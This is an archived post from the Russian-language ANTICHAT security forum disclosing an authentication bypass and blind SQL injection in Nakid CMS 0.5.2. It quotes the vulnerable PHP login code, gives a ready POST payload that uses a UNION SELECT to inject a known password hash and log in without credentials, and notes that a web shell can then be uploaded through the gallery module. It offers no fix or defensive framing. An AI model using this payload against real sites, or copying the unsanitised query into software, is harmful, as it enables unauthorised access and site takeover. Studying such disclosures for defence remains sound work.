Nakid CMS 0.5.2 — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Nakid CMS 0.5.2

20.03.2010, 13:46

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Nakid CMS 0.5.2

NakidCMS 0.5.2

Обход Авторизации && Blind SQLi
login_process.php
mq=off

PHP код:


		
			
$post_username = $_POST['username'];

$post_password = md5($_POST['password']);

$users_query = mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");

if(mysql_num_rows($users_query)<1){

  die("<p class='error'>No such user found</p>");

}

$users_array = mysql_fetch_array($users_query);

if($post_password != $users_array['password']){

  die("<p class='error'>Invalid Password</p>");

}

$_SESSION['uid'] = $users_array['id'];

echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");

redirect_page("index.php?p=home");

Exploit:

Код:

index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd

P.S.
Заливка шелла через модуль галереи.

Последний раз редактировалось geezer.code; 20.03.2010 в 13:49..